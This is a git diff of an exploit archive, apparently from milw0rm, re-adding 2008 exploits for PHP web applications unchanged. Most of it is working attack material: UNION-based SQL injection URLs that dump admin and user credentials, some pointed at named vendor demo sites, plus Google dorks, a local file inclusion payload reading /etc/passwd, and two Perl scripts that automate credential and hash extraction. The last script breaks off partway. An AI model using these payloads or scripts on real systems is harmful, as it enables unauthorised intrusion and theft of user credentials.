-~ #aikmel #e-c-h-o @irc.dal.net
-
----------------------------------------------------------------------------
-Contact:
-~~~~~
-
-K-159 || echo|staff || eufrato[at]gmail[dot]com
-Homepage: http://www.e-rdc.org/
-
--------------------------------- [ EOF ] ---------------------------------- 
-
-# milw0rm.com [2008-06-24]
+____________________   ___ ___ ________
+\_   _____/\_   ___ \ /   |   \\_____  \  
+ |    __)_ /    \  \//    ~    \/   |   \ 
+ |        \\     \___\    Y    /    |    \
+/_______  / \______  /\___|_  /\_______  /
+        \/         \/       \/         \/ 
+
+                                        .OR.ID
+ECHO_ADV_99$2008
+
+-----------------------------------------------------------------------------------------
+[ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability
+-----------------------------------------------------------------------------------------
+
+Author       : M.Hasran Addahroni
+Date         : June, 24 th 2008
+Location     : Jakarta, Indonesia
+Web          : http://e-rdc.org/v1/news.php?readmore=101
+Critical Lvl : Medium
+Impact       : System access
+Where        : From Remote
+---------------------------------------------------------------------------
+
+Affected software description:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Application : Relative Real Estate Systems
+version     : <= 3.0
+Vendor      : http://www.dboorn.com/estate/
+Description :
+
+Elegant real estate script that allows for unlimited listings and agents with featured listings, 
+unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows,
+Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. 
+request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support.
+
+---------------------------------------------------------------------------
+
+Vulnerability:
+~~~~~~~~~~~~~
+
+Input passed to the "listing_id" parameter in index.php is not properly verified before being used 
+in an sql query.
+This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors 
+and users in plain text.
+Successful exploitation requires that "magic_quotes" is off.
+
+
+Poc/Exploit:
+~~~~~~~~~
+
+http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--
+
+http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--
+
+Admin Login at http://[URL]/[PATH]/Admin/login_index.php
+
+Dork:
+~~~~
+Google : "index.php?go=listings&listing"
+
+
+Solution:
+~~~~~~
+
+- Edit the source code to ensure that input is properly verified.
+- Turn on magic_quotes in php.ini
+
+
+Timeline:
+~~~~~~~~
+
+- 24 - 06 - 2008 bug found
+- 24 - 06 - 2008 vendor contacted
+- 24 - 06 - 2008 advisory released
+---------------------------------------------------------------------------
+
+Shoutz:
+~~~~
+~ ping - my dearest wife, zautha - my little warrior
+~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
+the_hydra,neng chika, str0ke
+~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
+~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
+super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
+~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
+kuntua, stev_manado,nofry,k1tk4t,0pt1c
+~ newbie_hacker@yahoogroups.com
+~ #aikmel #e-c-h-o @irc.dal.net
+
+---------------------------------------------------------------------------
+Contact:
+~~~~~
+
+K-159 || echo|staff || eufrato[at]gmail[dot]com
+Homepage: http://www.e-rdc.org/
+
+-------------------------------- [ EOF ] ---------------------------------- 
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5925.txt b/platforms/php/webapps/5925.txt
index 516dbd9b3..6e9917681 100755
--- a/platforms/php/webapps/5925.txt
+++ b/platforms/php/webapps/5925.txt
@@ -1,51 +1,51 @@
-==============================================================
-  ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities
-==============================================================
- 
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 24 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : ShareCMS 
- VERSION     : 0.1 Beta
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/sharecms
-#####################################################
-
---- Remote SQL Injection ---
-
-----------
- Exploits
-----------
-
-[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection]
-[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection]
-
---------------
- POC Exploits
---------------
-
-[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
-[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-24]
+==============================================================
+  ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities
+==============================================================
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 24 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : ShareCMS 
+ VERSION     : 0.1 Beta
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/sharecms
+#####################################################
+
+--- Remote SQL Injection ---
+
+----------
+ Exploits
+----------
+
+[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection]
+[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection]
+
+--------------
+ POC Exploits
+--------------
+
+[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
+[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5928.txt b/platforms/php/webapps/5928.txt
index 9875929b8..f88aa91e7 100755
--- a/platforms/php/webapps/5928.txt
+++ b/platforms/php/webapps/5928.txt
@@ -1,52 +1,52 @@
-#################################################################################################
-####################################  proud to be muslim   ######################################
-###                                                                                           ###
-###                          rEm0te sql injction VulnErability                                ###
-###                                                                                           ###
-###                                   Hivemaker script                                        ###
-###                                                                                           ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### AuTh0r : security fears team                                                              ###
-###                                                                                           ###
-### H0ME   : WwW.alsonaa.CoM                                                                  ###
-###                                                                                           ###    
-### members: HeB4RieH , germaya_x                                                             ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### Script Name :  Hivemaker                                                                  ###
-###                                                                                           ###
-### download    :  http://www.scriptfactory.org/products.html                                 ###  
-###                                                                                           ###
-### download    :  http://www.hivemaker.com                                                   ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### d0rk ::  "use your mind "                                                                 ###
-### note ::   1-http://www.hivemaker.com/demo/admin/index.php (you can login from here)       ###
-###                                                                                           ###
-### -(:: sql Code ::)-                                                                        ###
-###        index.php?cid=(sql)                                                                ###
-###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
-###                                                                                           ###
-#################################################################################################
-###                                                                                           ###
-### -(::  l!ve demo ::)-                                                                      ###
-###                                                                                           ###
-###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
-###                                                                                           ###
-###                                                                                           ###
-########################                                                    #####################
-########################                                                    #####################
-#################################################################################################
-#################################################################################################
-                                   -(:: !GreTzZ! ::)-
-::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs::
-#################################################################################################
-#################################################################################################
-
-# milw0rm.com [2008-06-24]
+#################################################################################################
+####################################  proud to be muslim   ######################################
+###                                                                                           ###
+###                          rEm0te sql injction VulnErability                                ###
+###                                                                                           ###
+###                                   Hivemaker script                                        ###
+###                                                                                           ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### AuTh0r : security fears team                                                              ###
+###                                                                                           ###
+### H0ME   : WwW.alsonaa.CoM                                                                  ###
+###                                                                                           ###    
+### members: HeB4RieH , germaya_x                                                             ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### Script Name :  Hivemaker                                                                  ###
+###                                                                                           ###
+### download    :  http://www.scriptfactory.org/products.html                                 ###  
+###                                                                                           ###
+### download    :  http://www.hivemaker.com                                                   ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### d0rk ::  "use your mind "                                                                 ###
+### note ::   1-http://www.hivemaker.com/demo/admin/index.php (you can login from here)       ###
+###                                                                                           ###
+### -(:: sql Code ::)-                                                                        ###
+###        index.php?cid=(sql)                                                                ###
+###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
+###                                                                                           ###
+#################################################################################################
+###                                                                                           ###
+### -(::  l!ve demo ::)-                                                                      ###
+###                                                                                           ###
+###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
+###                                                                                           ###
+###                                                                                           ###
+########################                                                    #####################
+########################                                                    #####################
+#################################################################################################
+#################################################################################################
+                                   -(:: !GreTzZ! ::)-
+::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs::
+#################################################################################################
+#################################################################################################
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5929.txt b/platforms/php/webapps/5929.txt
index a9e735e95..26e42ff63 100755
--- a/platforms/php/webapps/5929.txt
+++ b/platforms/php/webapps/5929.txt
@@ -1,49 +1,49 @@
-#########################################################
-#
-#   Viral DX 1  SQL Injection Vulnerability
-#========================================================
-#
-#    Author: Hussin X                                   
-#                                                       
-#    Home :  www.tryag.cc/cc                            
-#                                                     
-#    email:  darkangel_g85[at]Yahoo[DoT]com            
-#            hussin.x[at]hotmail[DoT]com                
-#                                               
-#========================================================
-#    HomE script : http://e-topbiz.com/
-#     
-#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/  
-#    
-#
-##########################################################
-
-Exploit:   
-
-http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws
-
-(0x3a,login,pass)+from+pass--
-
-
-
-L!VE DEMO:
-
-http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-
-
-1+union+select+concat_ws(0x3a,login,pass)+from+pass--
-
-
-LoGiN :
-
-/admin/login.php
-
- 
-################################################################################
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
-#                                                                              #
-#################################(and All IRAQIs)###############################
-
-# milw0rm.com [2008-06-24]
+#########################################################
+#
+#   Viral DX 1  SQL Injection Vulnerability
+#========================================================
+#
+#    Author: Hussin X                                   
+#                                                       
+#    Home :  www.tryag.cc/cc                            
+#                                                     
+#    email:  darkangel_g85[at]Yahoo[DoT]com            
+#            hussin.x[at]hotmail[DoT]com                
+#                                               
+#========================================================
+#    HomE script : http://e-topbiz.com/
+#     
+#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/  
+#    
+#
+##########################################################
+
+Exploit:   
+
+http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws
+
+(0x3a,login,pass)+from+pass--
+
+
+
+L!VE DEMO:
+
+http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-
+
+1+union+select+concat_ws(0x3a,login,pass)+from+pass--
+
+
+LoGiN :
+
+/admin/login.php
+
+ 
+################################################################################
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
+#                                                                              #
+#################################(and All IRAQIs)###############################
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5930.txt b/platforms/php/webapps/5930.txt
index 66465eddb..eae5efa34 100755
--- a/platforms/php/webapps/5930.txt
+++ b/platforms/php/webapps/5930.txt
@@ -1,52 +1,52 @@
-#########################################################
-#
-#   Link ADS 1  SQL Injection Vulnerability
-#========================================================
-#
-#    Author: Hussin X                                   
-#                                                       
-#    Home :  www.tryag.cc/cc                            
-#                                                     
-#    email:  darkangel_g85[at]Yahoo[DoT]com            
-#            hussin.x[at]hotmail[DoT]com                
-#                                               
-#========================================================
-#    HomE script : http://e-topbiz.com/
-#     
-#    Demo : http://e-topbiz.com/oprema/pages/linkads1.php  
-#    
-#    DorK : out.php?linkid=1
-#    DorK : inurl:"out.php?linkid=1"
-##########################################################
-
-Exploit:   
-
-
-http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
-
-
-
-
-L!VE DEMO:
-
-http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
-
-
-LogiN:
-
-
-/admin/
-
- 
-################################################################################
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-
-#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
-
-#                                                                              #
-#################################(and All IRAQIs)###############################
-################################################################################
-
-# milw0rm.com [2008-06-24]
+#########################################################
+#
+#   Link ADS 1  SQL Injection Vulnerability
+#========================================================
+#
+#    Author: Hussin X                                   
+#                                                       
+#    Home :  www.tryag.cc/cc                            
+#                                                     
+#    email:  darkangel_g85[at]Yahoo[DoT]com            
+#            hussin.x[at]hotmail[DoT]com                
+#                                               
+#========================================================
+#    HomE script : http://e-topbiz.com/
+#     
+#    Demo : http://e-topbiz.com/oprema/pages/linkads1.php  
+#    
+#    DorK : out.php?linkid=1
+#    DorK : inurl:"out.php?linkid=1"
+##########################################################
+
+Exploit:   
+
+
+http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
+
+
+
+
+L!VE DEMO:
+
+http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
+
+
+LogiN:
+
+
+/admin/
+
+ 
+################################################################################
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+
+#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
+
+#                                                                              #
+#################################(and All IRAQIs)###############################
+################################################################################
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5931.pl b/platforms/php/webapps/5931.pl
index 0f1be8e97..269886991 100755
--- a/platforms/php/webapps/5931.pl
+++ b/platforms/php/webapps/5931.pl
@@ -1,61 +1,61 @@
-#!/usr/bin/perl
-# k1tk4t Public Security Advisory
-# ////////////////////////////////////////////////////////////
-# TOKOKITA Multiple Remote SQL Injection 
-# Demosite	: http://www.tokokita.net/toko/
-# Vendor	: http://www.tokokita.com/
-# Kutu		: 1. catlist.php?cat_id=[Blind SQLi]
-#		  2. catlist_detail.php?cat_id=[Blind SQLi]
-#	          3. barang.php?produk_id=[SQLi]
-# Terimakasih untuk ;
-# str0ke,DNX,n0c0py,L41n,
-# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
-# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
-use LWP::UserAgent;
-
-if ( !$ARGV[1] ) {
-	print "\n //////////////////////////////////////////////////////////////////";
-	print "\n //                      ..::> k1tk4t <::..                      //";
-	print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
-	print "\n //////////////////////////////////////////////////////////////////";
-	print "\n[!] ";
-	print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
-	print "\n[!] Contoh     : perl tokokita.pl localhost /toko/";
-	print "\n[!] ";
-	print "\n";
-	exit;
-}
-$site   = $ARGV[0];
-$path   = $ARGV[1];
-$sqlinj = "union+
-select+
-null,
-null,
-null,
-concat(0x6b3174,email,0x316e),
-null,
-concat(0x6b3474,password,0x307574),
-null,
-null,
-null,
-null,
-null+
-from+
-user_admin/*";    
-$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
-. $sqlinj;
-$www  = new LWP::UserAgent;
-print "\n\n [!] Injeksi SQL \n";
-$res = $www->get($expl) or err ();
-$hasil = $res->content;
-if ( $hasil =~ /k1t(.*?)1n/ ) {
-	print "\n [+] Username      : $1";
-	$hasil =~ /k4t(.*?)0ut/, print "\n [+] Password      : $1";
-	print "\n\n";
-} 
-else {
-	print "\n [-] Exploit gagal ;)";
-	exit();
-}
-
-# milw0rm.com [2008-06-24]
+#!/usr/bin/perl
+# k1tk4t Public Security Advisory
+# ////////////////////////////////////////////////////////////
+# TOKOKITA Multiple Remote SQL Injection 
+# Demosite	: http://www.tokokita.net/toko/
+# Vendor	: http://www.tokokita.com/
+# Kutu		: 1. catlist.php?cat_id=[Blind SQLi]
+#		  2. catlist_detail.php?cat_id=[Blind SQLi]
+#	          3. barang.php?produk_id=[SQLi]
+# Terimakasih untuk ;
+# str0ke,DNX,n0c0py,L41n,
+# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
+# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
+use LWP::UserAgent;
+
+if ( !$ARGV[1] ) {
+	print "\n //////////////////////////////////////////////////////////////////";
+	print "\n //                      ..::> k1tk4t <::..                      //";
+	print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
+	print "\n //////////////////////////////////////////////////////////////////";
+	print "\n[!] ";
+	print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
+	print "\n[!] Contoh     : perl tokokita.pl localhost /toko/";
+	print "\n[!] ";
+	print "\n";
+	exit;
+}
+$site   = $ARGV[0];
+$path   = $ARGV[1];
+$sqlinj = "union+
+select+
+null,
+null,
+null,
+concat(0x6b3174,email,0x316e),
+null,
+concat(0x6b3474,password,0x307574),
+null,
+null,
+null,
+null,
+null+
+from+
+user_admin/*";    
+$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
+. $sqlinj;
+$www  = new LWP::UserAgent;
+print "\n\n [!] Injeksi SQL \n";
+$res = $www->get($expl) or err ();
+$hasil = $res->content;
+if ( $hasil =~ /k1t(.*?)1n/ ) {
+	print "\n [+] Username      : $1";
+	$hasil =~ /k4t(.*?)0ut/, print "\n [+] Password      : $1";
+	print "\n\n";
+} 
+else {
+	print "\n [-] Exploit gagal ;)";
+	exit();
+}
+
+# milw0rm.com [2008-06-24]
diff --git a/platforms/php/webapps/5932.txt b/platforms/php/webapps/5932.txt
index 4af5525c3..8ebb3b39b 100755
--- a/platforms/php/webapps/5932.txt
+++ b/platforms/php/webapps/5932.txt
@@ -1,49 +1,49 @@
-=========================================================================
-  Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
-=========================================================================
- 
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 25 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : Webdevindo-CMS 
- VERSION     : 1.0.0
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/webdevindo-cms
-#####################################################
-
---- Remote SQL Injection ---
-
----------
- Exploit
----------
-
-[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection]
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-25]
+=========================================================================
+  Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
+=========================================================================
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 25 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : Webdevindo-CMS 
+ VERSION     : 1.0.0
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/webdevindo-cms
+#####################################################
+
+--- Remote SQL Injection ---
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection]
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5933.txt b/platforms/php/webapps/5933.txt
index 747e8b445..a7722cbde 100755
--- a/platforms/php/webapps/5933.txt
+++ b/platforms/php/webapps/5933.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-|  Author => StAkeR ~ StAkeR@hotmail.it         |  
-@~~===========================================~~@ 
-+                                               + 
-@~~===========================================~~@
-|  mUnky 0.0.1 <= Local File Inclusion Vuln     |
-@~~===========================================~~@
-|  index.php?zone=../../../../../etc/passwd%00  |                        
-@~~===========================================~~@
-+
-@~~=========================================================================~~@
-|  http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz   |
-@~~=========================================================================~~@
-
-# milw0rm.com [2008-06-25]
+@~~===========================================~~@
+|  Author => StAkeR ~ StAkeR@hotmail.it         |  
+@~~===========================================~~@ 
++                                               + 
+@~~===========================================~~@
+|  mUnky 0.0.1 <= Local File Inclusion Vuln     |
+@~~===========================================~~@
+|  index.php?zone=../../../../../etc/passwd%00  |                        
+@~~===========================================~~@
++
+@~~=========================================================================~~@
+|  http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz   |
+@~~=========================================================================~~@
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5934.txt b/platforms/php/webapps/5934.txt
index bf4cb12dc..40a595111 100755
--- a/platforms/php/webapps/5934.txt
+++ b/platforms/php/webapps/5934.txt
@@ -1,45 +1,45 @@
-#########################################################
-#
-#   Jokes & Funny Pics Script  SQL Injection Vulnerability
-#========================================================
-#
-#    Author: Hussin X                                   
-#                                                       
-#    Home :  www.tryag.cc/cc                            
-#                                                     
-#    email:  darkangel_g85[at]Yahoo[DoT]com            
-#            hussin.x[at]hotmail[DoT]com                
-#                                               
-#========================================================
-#    HomE script : http://www.softbizscripts.com
-#     
-#    Demo : http://www.softbizscripts.com/scripts/jokes  
-#    
-#    DorK : "index.php?sbjoke_id="
-
-##########################################################
-
-Exploit:   
-
-
-http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
-
-
-Exploit: 2
-
-index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--
-
-Login :
-
-/admin/
-
- 
-################################################################################
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
-#                                                                              #
-#################################(and All IRAQIs)###############################
-
-# milw0rm.com [2008-06-25]
+#########################################################
+#
+#   Jokes & Funny Pics Script  SQL Injection Vulnerability
+#========================================================
+#
+#    Author: Hussin X                                   
+#                                                       
+#    Home :  www.tryag.cc/cc                            
+#                                                     
+#    email:  darkangel_g85[at]Yahoo[DoT]com            
+#            hussin.x[at]hotmail[DoT]com                
+#                                               
+#========================================================
+#    HomE script : http://www.softbizscripts.com
+#     
+#    Demo : http://www.softbizscripts.com/scripts/jokes  
+#    
+#    DorK : "index.php?sbjoke_id="
+
+##########################################################
+
+Exploit:   
+
+
+http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
+
+
+Exploit: 2
+
+index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--
+
+Login :
+
+/admin/
+
+ 
+################################################################################
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
+#                                                                              #
+#################################(and All IRAQIs)###############################
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5935.pl b/platforms/php/webapps/5935.pl
index db461d788..81884e0a2 100755
--- a/platforms/php/webapps/5935.pl
+++ b/platforms/php/webapps/5935.pl
@@ -1,106 +1,106 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use Getopt::Long;
-
-if(!$ARGV[1])
-{
- print " \n";
- print " #######################################################################\n";
- print "  #   Mambo Component Articles Blind SQL Injection Exploit #\n";
- print "  #   Author:Ded MustD!e [www.antichat.ru] #\n";
- print "  # #\n";
- print "  #   Dork :   inurl:option=articles artid #\n";
- print "  #   Usage:   perl exploit.pl host path  #\n";
- print "  #   Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
- print "  # #\n";
- print "  #   Options: #\n";
- print "  #     -a   valid Article id #\n";
- print " #######################################################################\n";
- exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $userid  = 1;
-my $aid     = $ARGV[2];
-
-my %options = ();
-GetOptions(\%options, "u=i", "p=s", "a=i");
-
-print "[~] Exploiting...\n";
-
-if($options{"u"})
-{
- $userid = $options{"u"};
-}
-
-if($options{"a"})
-{
- $aid = $options{"a"};
-}
-
-syswrite(STDOUT, "[~] MD5-Hash: ", 14);
-
-for(my $i = 1; $i <= 32; $i++)
-{
- my $f = 0;
- my $h = 48;
- while(!$f && $h <= 57)
- {
-   if(istrue2($host, $path, $userid, $aid, $i, $h))
-   {
-     $f = 1;
-     syswrite(STDOUT, chr($h), 1);
-   }
-   $h++;
- }
- if(!$f)
- {
-   $h = 97;
-   while(!$f && $h <= 122)
-   {
-     if(istrue2($host, $path, $userid, $aid, $i, $h))
-     {
-       $f = 1;
-       syswrite(STDOUT, chr($h), 1);
-     }
-     $h++;
-   }
- }
-}
-
-print "\n[~] Exploiting done\n";
-
-sub istrue2
-{
- my $host  = shift;
- my $path  = shift;
- my $uid   = shift;
- my $aid   = shift;
- my $i     = shift;
- my $h     = shift;
-
- my $ua = LWP::UserAgent->new;
- my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
-
- if($options{"p"})
- {
-   $ua->proxy('http', "http://".$options{"p"});
- }
-
- my $resp = $ua->get($query);
- my $content = $resp->content;
- my $regexp = "Back";
-
- if($content =~ /$regexp/)
- {
-   return 1;
- }
- else
- {
-   return 0;
